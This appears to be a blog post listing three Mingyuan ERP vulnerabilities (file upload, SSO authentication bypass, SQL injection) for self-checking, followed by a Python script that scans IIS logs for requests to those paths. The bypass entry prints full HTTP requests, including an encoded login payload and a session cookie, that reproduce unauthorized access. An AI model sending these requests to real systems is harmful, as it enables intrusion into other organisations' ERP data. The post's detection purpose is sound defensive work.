Mingyuan-Related Vulnerability Self-Check List (2025)

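  1. Mingyuan Cloud ERP document service system arbitrary file upload

    1. Vulnerability type: File upload
    2. Vulnerable path: To be confirmed
    3. Verification method: To be confirmed
  2. Mingyuan ERP sso/login.aspx authentication bypass

    1. Vulnerability type: Unauthorized access
    2. Vulnerable path: /PubPlatform/nav/login/sso/login.aspx
    3. Verification method: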
      POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      
      __yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d
      
      
      
      GET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
      Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;
      

        

  3. Mingyuan Real Estate ERP DataRuleXMLHTTP.aspx SQL injection

    1. Vulnerability type: SQL injection
    2. Vulnerable path: DataRuleXMLHTTP.aspx
    3. Verification method: To be confirmed
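
For the self-check itself, an added example (not part of the original post): a scan of IIS W3C access logs for requests to the paths listed above, including the POST-then-home-page sequence shown in item 2. The log field order, sample lines, IP addresses and the `/placeholder/` directory are constructed; IIS does not record POST bodies by default, so a hit is a lead for review, not confirmation.

```python
# Paths come from the checklist; compared in lowercase because IIS is case-insensitive.
SSO_PATH = "/pubplatform/nav/login/sso/login.aspx"
HOME_PATH = "/pubplatform/nav/home/default"
SQLI_FILE = "/datarulexmlhttp.aspx"

# Constructed sample log (documentation IP ranges, placeholder directory).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2025-07-20 03:11:02 GET /PubPlatform/nav/home/default _nav=0000 192.0.2.10 302
2025-07-20 03:12:40 POST /PubPlatform/Nav/Login/SSO/Login.aspx - 198.51.100.7 200
2025-07-20 03:12:41 GET /PubPlatform/nav/home/default _nav=0000 198.51.100.7 200
2025-07-20 03:15:09 POST /placeholder/DataRuleXMLHTTP.aspx - 203.0.113.5 500
"""

def parse_w3c(lines):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed lines
                yield dict(zip(fields, values))

def scan(lines):
    """Return (timestamp, client IP, reason, status) tuples worth reviewing."""
    findings, sso_clients = [], set()
    for row in parse_w3c(lines):
        path = row.get("cs-uri-stem", "").lower()
        method = row.get("cs-method", "").upper()
        ip = row.get("c-ip", "-")
        when = f'{row.get("date", "-")} {row.get("time", "-")}'
        status = row.get("sc-status", "-")
        if path == SSO_PATH and method == "POST":
            sso_clients.add(ip)  # remember the client for the follow-up check
            findings.append((when, ip, "POST to sso/login.aspx", status))
        elif path == HOME_PATH and ip in sso_clients:
            findings.append((when, ip, "home page after SSO POST", status))
        elif path.endswith(SQLI_FILE):
            findings.append((when, ip, "request to DataRuleXMLHTTP.aspx", status))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(*finding, sep="  ")
```
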
posted @ 2025-07-27 11:02  r1ch4rd_L